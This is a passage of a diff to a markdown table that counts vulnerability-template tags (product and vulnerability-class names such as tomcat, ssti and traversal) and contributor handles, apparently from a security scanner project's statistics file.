| | | | -| ssti | 5 | randomrobbie | 2 | | | | | | | -| phpmyadmin | 5 | ree4pwn | 2 | | | | | | | -| jetty | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| java | 5 | afaq | 2 | | | | | | | -| confluence | 5 | bp0lr | 2 | | | | | | | -| iis | 5 | elsfa7110 | 2 | | | | | | | -| login | 5 | 0xelkomy | 2 | | | | | | | -| cve2009 | 4 | x1m_martijn | 2 | | | | | | | -| netgear | 4 | lu4nx | 2 | | | | | | | -| nodejs | 4 | foulenzer | 2 | | | | | | | -| jolokia | 4 | shifacyclewala | 2 | | | | | | | -| solarwinds | 4 | ehsahil | 2 | | | | | | | -| traversal | 4 | dheerajmadhukar | 2 | | | | | | | -| elastic | 4 | gevakun | 2 | | | | | | | -| router | 4 | vavkamil | 2 | | | | | | | -| vpn | 4 | emenalf | 2 | | | | | | | -| thinkphp | 4 | moritz nentwig | 2 | | | | | | | -| asp | 4 | arcc | 1 | | | | | | | -| django | 4 | hakluke | 1 | | | | | | | -| hongdian | 4 | rojanrijal | 1 | | | | | | | -| moodle | 4 | naglinagli | 1 | | | | | | | -| tomcat | 4 | shifacyclewla | 1 | | | | | | | -| artifactory | 4 | pdp | 1 | | | | | | | -| samsung | 4 | dawid czarnecki | 1 | | | | | | | -| magmi | 4 | deena | 1 | | | | | | | -| webserver | 4 | raesene | 1 | | | | | | | -| thinkcmf | 4 | bjhulst | 1 | | | | | | | -| docker | 4 | bing0o | 1 | | | | | | | -| fileupload | 4 | pudsec | 1 | | | | | | | -| ibm | 4 | remonsec | 1 | | | | | | | -| kafka | 3 | koti2 | 1 | | | | | | | -| ofbiz | 3 | yashgoti | 1 | | | | | | | -| openssh | 3 | thezakman | 1 | | | | | | | -| grafana | 3 | idealphase | 1 | | | | | | | -| log | 3 | streetofhackerr007 | 1 | | | | | | | -| springcloud | 3 | c3l3si4n | 1 | | | | | | | -| nosqli | 3 | akash.c | 1 | | | | | | | -| mongodb | 3 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| git | 3 | its0x08 | 1 | | | | | | | -| terramaster | 3 | becivells | 1 | | | | | | | -| fanruan | 3 | 0h1in9e | 1 | | | | | | | -| lfr | 3 | juicypotato1 | 1 | | | | | | | -| kubernetes | 3 | fabaff | 1 | | | | | | | -| oa | 3 | dogasantos | 1 | | | | | | | -| slack | 3 | th3.d1p4k | 1 | | | | | | | -| backups | 3 | alph4byt3 | 1 | | | | | | | -| ebs | 3 | tirtha_mandal | 1 | | | | | | | -| deserialization | 3 | j33n1k4 | 1 | | | | | | | -| microstrategy | 3 | regala_ | 1 | | | | | | | -| bypass | 3 | mohammedsaneem | 1 | | | | | | | -| dedecms | 3 | luci | 1 | | | | | | | -| crlf | 3 | ringo | 1 | | | | | | | -| vbulletin | 3 | luskabol | 1 | | | | | | | -| caucho | 3 | 0xrod | 1 | | | | | | | -| ssh | 3 | sushant kamble | 1 | | | | | | | +| drupal | 5 | jarijaas | 2 | | | | | | | +| jolokia | 4 | bsysop | 2 | | | | | | | +| artifactory | 4 | zomsop82 | 2 | | | | | | | +| hongdian | 4 | pxmme1337 | 2 | | | | | | | +| thinkcmf | 4 | 0xsapra | 2 | | | | | | | +| ibm | 4 | 0xelkomy | 2 | | | | | | | +| netgear | 4 | 0xprial | 2 | | | | | | | +| asp | 4 | joeldeleep | 2 | | | | | | | +| moodle | 4 | randomrobbie | 2 | | | | | | | +| vpn | 4 | foulenzer | 2 | | | | | | | +| traversal | 4 | ehsahil | 2 | | | | | | | +| nodejs | 4 | idealphase | 1 | | | | | | | +| tomcat | 4 | ajaysenr | 1 | | | | | | | +| webserver | 4 | bad5ect0r | 1 | | | | | | | +| elastic | 4 | chron0x | 1 | | | | | | | +| thinkphp | 4 | mhdsamx | 1 | | | | | | | +| samsung | 4 | alperenkesk | 1 | | | | | | | +| cve2009 | 4 | divya_mudgal | 1 | | | | | | | +| magmi | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| solarwinds | 4 | 0xrod | 1 | | | | | | | +| fileupload | 4 | remonsec | 1 | | | | | | | +| django | 4 | j3ssie/geraldino2 | 1 | | | | | | | +| docker | 4 | alifathi-h1 | 1 | | | | | | | +| router | 4 | omarkurt | 1 | | | | | | | +| mongodb | 3 | 52971 | 1 | | | | | | | +| backups | 3 | bolli95 | 1 | | | | | | | +| ssh | 3 | dogasantos | 1 | | | | | | | +| caucho | 3 | tirtha_mandal | 1 | | | | | | | +| windows | 3 | @dwisiswant0 | 1 | | | | | | | +| r-seenet | 3 | pdp | 1 | | | | | | | +| slack | 3 | notsoevilweasel | 1 | | | | | | | +| fanruan | 3 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| nacos | 3 | w4cky_ | 1 | | | | | | | +| ebs | 3 | sushant kamble | 1 | | | | | | | | | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | -| printer | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| nacos | 3 | taielab | 1 | | | | | | | -| windows | 3 | schniggie | 1 | | | | | | | -| amazon | 3 | kba@sogeti_esec | 1 | | | | | | | -| fpd | 3 | daviey | 1 | | | | | | | -| r-seenet | 3 | aceseven (digisec360) | 1 | | | | | | | -| resin | 3 | geraldino2 | 1 | | | | | | | -| zabbix | 2 | affix | 1 | | | | | | | -| sonarqube | 2 | _darrenmartyn | 1 | | | | | | | -| icewarp | 2 | bad5ect0r | 1 | | | | | | | -| oauth | 2 | rtcms | 1 | | | | | | | -| dos | 2 | berkdusunur | 1 | | | | | | | -| rockmongo | 2 | ipanda | 1 | | | | | | | -| seeyon | 2 | shelld3v | 1 | | | | | | | -| xxljob | 2 | 52971 | 1 | | | | | | | -| paloalto | 2 | furkansenan | 1 | | | | | | | -| odoo | 2 | johnjhacking | 1 | | | | | | | -| glassfish | 2 | @dwisiswant0 | 1 | | | | | | | -| strapi | 2 | manuelbua | 1 | | | | | | | -| wordfence | 2 | mubassirpatel | 1 | | | | | | | -| waf | 2 | undefl0w | 1 | | | | | | | -| saltstack | 2 | mah3sec_ | 1 | | | | | | | -| showdoc | 2 | cookiehanhoan | 1 | | | | | | | -| webcam | 2 | kabirsuda | 1 | | | | | | | -| ecology | 2 | iampritam | 1 | | | | | | | -| httpd | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| proxy | 2 | b4uh0lz | 1 | | | | | | | -| sharepoint | 2 | toufik airane | 1 | | | | | | | -| nagios | 2 | notsoevilweasel | 1 | | | | | | | -| hp | 2 | knassar702 | 1 | | | | | | | -| rstudio | 2 | s1r1u5_ | 1 | | | | | | | -| prometheus | 2 | nytr0gen | 1 | | | | | | | -| nexus | 2 | sy3omda | 1 | | | | | | | -| huawei | 2 | ldionmarcil | 1 | | | | | | | -| telerik | 2 | absshax | 1 | | | | | | | -| spark | 2 | co0nan | 1 | | | | | | | -| mida | 2 | tim_koopmans | 1 | | | | | | | -| chamilo | 2 | noamrathaus | 1 | | | | | | | -| smtp | 2 | sshell | 1 | | | | | | | -| trixbox | 2 | kareemse1im | 1 | | | | | | | -| mail | 2 | patralos | 1 | | | | | | | -| zhiyuan | 2 | zandros0 | 1 | | | | | | | -| hjtcloud | 2 | ahmed sherif | 1 | | | | | | | -| rockethchat | 2 | _harleo | 1 | | | | | | | -| plesk | 2 | soyelmago | 1 | | | | | | | -| frp | 2 | ajaysenr | 1 | | | | | | | -| jboss | 2 | thevillagehacker | 1 | | | | | | | -| splunk | 2 | nkxxkn | 1 | | | | | | | -| vrealize | 2 | d0rkerdevil | 1 | | | | | | | -| microsoft | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| kibana | 2 | bolli95 | 1 | | | | | | | -| leak | 2 | defr0ggy | 1 | | | | | | | -| hpe | 2 | shreyapohekar | 1 | | | | | | | -| keycloak | 2 | smaranchand | 1 | | | | | | | -| service | 2 | sicksec | 1 | | | | | | | -| bitrix | 2 | 0xtavian | 1 | | | | | | | -| jellyfin | 2 | dudez | 1 | | | | | | | -| flir | 2 | fopina | 1 | | | | | | | -| exposures | 2 | sullo | 1 | | | | | | | -| cache | 2 | mhdsamx | 1 | | | | | | | -| voipmonitor | 2 | johnk3r | 1 | | | | | | | -| bigip | 2 | micha3lb3n | 1 | | | | | | | -| emerge | 2 | wabafet | 1 | | | | | | | -| shellshock | 2 | alex | 1 | | | | | | | -| injection | 2 | omarkurt | 1 | | | | | | | -| yapi | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| openssh | 3 | ahmed sherif | 1 | | | | | | | +| bypass | 3 | rtcms | 1 | | | | | | | +| amazon | 3 | aceseven (digisec360) | 1 | | | | | | | +| lfr | 3 | jeya seelan | 1 | | | | | | | +| log | 3 | becivells | 1 | | | | | | | +| microstrategy | 3 | johnk3r | 1 | | | | | | | +| springcloud | 3 | streetofhackerr007 | 1 | | | | | | | +| fpd | 3 | mubassirpatel | 1 | | | | | | | +| terramaster | 3 | affix | 1 | | | | | | | +| deserialization | 3 | dudez | 1 | | | | | | | +| resin | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| ucmdb | 2 | ooooooo_q | 1 | | | | | | | -| intrusive | 2 | chron0x | 1 | | | | | | | -| fortios | 2 | gboddin | 1 | | | | | | | -| sonicwall | 2 | 0ut0fb4nd | 1 | | | | | | | -| pega | 2 | qlkwej | 1 | | | | | | | -| globalprotect | 2 | ratnadip gajbhiye | 1 | | | | | | | -| activemq | 2 | willd96 | 1 | | | | | | | -| cve2008 | 2 | apt-mirror | 1 | | | | | | | -| openam | 2 | _generic_human_ | 1 | | | | | | | -| coldfusion | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| openfire | 2 | divya_mudgal | 1 | | | | | | | -| hashicorp | 2 | kurohost | 1 | | | | | | | -| smb | 2 | _c0wb0y_ | 1 | | | | | | | -| maian | 2 | w4cky_ | 1 | | | | | | | -| couchdb | 2 | r3naissance | 1 | | | | | | | -| kentico | 2 | ilovebinbash | 1 | | | | | | | -| natshell | 2 | jeya seelan | 1 | | | | | | | -| nextjs | 2 | whynotke | 1 | | | | | | | -| idrac | 2 | akshansh | 1 | | | | | | | -| totaljs | 1 | exploitation | 1 | | | | | | | -| soar | 1 | ohlinge | 1 | | | | | | | -| traefik | 1 | yashanand155 | 1 | | | | | | | -| b2evolution | 1 | gal nagli | 1 | | | | | | | -| wavemaker | 1 | zhenwarx | 1 | | | | | | | -| enumeration | 1 | fmunozs | 1 | | | | | | | -| subrion | 1 | vsh00t | 1 | | | | | | | -| ems | 1 | @github.com/defr0ggy | 1 | | | | | | | -| comodo | 1 | elmahdi | 1 | | | | | | | -| yii | 1 | rodnt | 1 | | | | | | | -| htmli | 1 | yavolo | 1 | | | | | | | -| darkstat | 1 | abison_binoy | 1 | | | | | | | -| phalcon | 1 | alifathi-h1 | 1 | | | | | | | -| axis | 1 | hanlaomo | 1 | | | | | | | -| netsweeper | 1 | blckraven | 1 | | | | | | | -| jnoj | 1 | kishore krishna (sillydaddy) | 1 | | | | | | | -| skywalking | 1 | alperenkesk | 1 | | | | | | | -| targa | 1 | flag007 | 1 | | | | | | | -| octobercms | 1 | sickwell | 1 | | | | | | | -| tpshop | 1 | andirrahmani1 | 1 | | | | | | | -| azure | 1 | vzamanillo | 1 | | | | | | | -| heroku | 1 | streetofhackerr007 (rohit | 1 | | | | | | | +| oa | 3 | rojanrijal | 1 | | | | | | | +| grafana | 3 | hanlaomo | 1 | | | | | | | +| kafka | 3 | alph4byt3 | 1 | | | | | | | +| git | 3 | mohammedsaneem | 1 | | | | | | | +| dedecms | 3 | andirrahmani1 | 1 | | | | | | | +| crlf | 3 | ilovebinbash | 1 | | | | | | | +| ofbiz | 3 | whynotke | 1 | | | | | | | +| kubernetes | 3 | alex | 1 | | | | | | | +| nosqli | 3 | c3l3si4n | 1 | | | | | | | +| printer | 3 | taielab | 1 | | | | | | | +| vbulletin | 3 | cookiehanhoan | 1 | | | | | | | +| icewarp | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| nexus | 2 | abison_binoy | 1 | | | | | | | +| service | 2 | smaranchand | 1 | | | | | | | +| bigip | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| mail | 2 | akash.c | 1 | | | | | | | +| dos | 2 | juicypotato1 | 1 | | | | | | | +| smtp | 2 | luci | 1 | | | | | | | +| leak | 2 | nytr0gen | 1 | | | | | | | +| hashicorp | 2 | vsh00t | 1 | | | | | | | +| frp | 2 | j33n1k4 | 1 | | | | | | | +| mida | 2 | defr0ggy | 1 | | | | | | | +| splunk | 2 | bing0o | 1 | | | | | | | +| httpd | 2 | thezakman | 1 | | | | | | | +| kibana | 2 | deena | 1 | | | | | | | +| zhiyuan | 2 | sy3omda | 1 | | | | | | | +| saltstack | 2 | knassar702 | 1 | | | | | | | +| rockethchat | 2 | noamrathaus | 1 | | | | | | | +| maian | 2 | _harleo | 1 | | | | | | | +| globalprotect | 2 | sullo | 1 | | | | | | | +| kentico | 2 | zandros0 | 1 | | | | | | | +| exposures | 2 | apt-mirror | 1 | | | | | | | +| cve2008 | 2 | dawid czarnecki | 1 | | | | | | | +| intrusive | 2 | manuelbua | 1 | | | | | | | +| hp | 2 | naglinagli | 1 | | | | | | | +| rstudio | 2 | ooooooo_q | 1 | | | | | | | +| flir | 2 | fopina | 1 | | | | | | | +| plesk | 2 | regala_ | 1 | | | | | | | +| rockmongo | 2 | sicksec | 1 | | | | | | | +| yapi | 2 | pudsec | 1 | | | | | | | +| injection | 2 | wabafet | 1 | | | | | | | +| activemq | 2 | ratnadip gajbhiye | 1 | | | | | | | +| sonicwall | 2 | soyelmago | 1 | | | | | | | +| sonarqube | 2 | ipanda | 1 | | | | | | | +| jboss | 2 | patralos | 1 | | | | | | | +| fortios | 2 | streetofhackerr007 (rohit | 1 | | | | | | | | | | soni) | | | | | | | | -| discord | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| firebase | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| dlogin | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| zimbra | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| itop | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| grav | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| linkerd | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| hasura | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| jsf | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| ec2 | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| cve2005 | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| igs | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| npm | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| cve2010 | 1 | | | | | | | | | -| revision | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| akamai | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| netis | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| wso2 | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | +| openfire | 2 | 0h1in9e | 1 | | | | | | | +| pega | 2 | thevillagehacker | 1 | | | | | | | +| idrac | 2 | yashanand155 | 1 | | | | | | | +| nagios | 2 | gboddin | 1 | | | | | | | +| nextjs | 2 | flag007 | 1 | | | | | | | +| ecology | 2 | schniggie | 1 | | | | | | | +| cache | 2 | sickwell | 1 | | | | | | | +| chamilo | 2 | mah3sec_ | 1 | | | | | | | +| paloalto | 2 | fabaff | 1 | | | | | | | +| hjtcloud | 2 | sshell | 1 | | | | | | | +| strapi | 2 | @github.com/defr0ggy | 1 | | | | | | | +| ucmdb | 2 | yashgoti | 1 | | | | | | | +| bitrix | 2 | s1r1u5_ | 1 | | | | | | | +| xxljob | 2 | _c0wb0y_ | 1 | | | | | | | +| sharepoint | 2 | absshax | 1 | | | | | | | +| voipmonitor | 2 | kareemse1im | 1 | | | | | | | +| showdoc | 2 | micha3lb3n | 1 | | | | | | | +| natshell | 2 | shifacyclewla | 1 | | | | | | | +| glassfish | 2 | toufik airane | 1 | | | | | | | +| shellshock | 2 | ringo | 1 | | | | | | | +| keycloak | 2 | co0nan | 1 | | | | | | | +| oauth | 2 | kabirsuda | 1 | | | | | | | +| waf | 2 | hakluke | 1 | | | | | | | +| huawei | 2 | kurohost | 1 | | | | | | | +| wordfence | 2 | exploitation | 1 | | | | | | | +| microsoft | 2 | yavolo | 1 | | | | | | | +| odoo | 2 | nkxxkn | 1 | | | | | | | +| hpe | 2 | its0x08 | 1 | | | | | | | +| couchdb | 2 | berkdusunur | 1 | | | | | | | +| webcam | 2 | ldionmarcil | 1 | | | | | | | +| coldfusion | 2 | rodnt | 1 | | | | | | | +| spark | 2 | willd96 | 1 | | | | | | | +| trixbox | 2 | th3.d1p4k | 1 | | | | | | | +| seeyon | 2 | shreyapohekar | 1 | | | | | | | +| vrealize | 2 | undefl0w | 1 | | | | | | | +| jellyfin | 2 | luskabol | 1 | | | | | | | +| openam | 2 | elmahdi | 1 | | | | | | | +| emerge | 2 | gal nagli | 1 | | | | | | | +| smb | 2 | d0rkerdevil | 1 | | | | | | | +| zabbix | 2 | bjhulst | 1 | | | | | | | +| telerik | 2 | b4uh0lz | 1 | | | | | | | +| proxy | 2 | vzamanillo | 1 | | | | | | | +| prometheus | 2 | ohlinge | 1 | | | | | | | +| extractor | 1 | tim_koopmans | 1 | | | | | | | +| emby | 1 | arcc | 1 | | | | | | | +| razor | 1 | furkansenan | 1 | | | | | | | +| servicedesk | 1 | akshansh | 1 | | | | | | | +| discourse | 1 | qlkwej | 1 | | | | | | | +| axis | 1 | koti2 | 1 | | | | | | | +| phpunit | 1 | kba@sogeti_esec | 1 | | | | | | | +| triconsole | 1 | _generic_human_ | 1 | | | | | | | +| fuelcms | 1 | shelld3v | 1 | | | | | | | +| sco | 1 | fmunozs | 1 | | | | | | | +| zmanda | 1 | geraldino2 | 1 | | | | | | | +| anchorcms | 1 | r3naissance | 1 | | | | | | | +| drone | 1 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| postmessage | 1 | iampritam | 1 | | | | | | | +| aspnuke | 1 | _darrenmartyn | 1 | | | | | | | +| blue-ocean | 1 | 0ut0fb4nd | 1 | | | | | | | +| rdp | 1 | 0xtavian | 1 | | | | | | | +| zeroshell | 1 | blckraven | 1 | | | | | | | +| tika | 1 | daviey | 1 | | | | | | | +| sqlite | 1 | raesene | 1 | | | | | | | +| mailchimp | 1 | zhenwarx | 1 | | | | | | | +| moinmoin | 1 | johnjhacking | 1 | | | | | | | | nette | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| horde | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | | linkedin | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| status | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| exchange | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| backdoor | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| akamai | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | | plastic | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| wp-theme | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| symfony | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| grails | 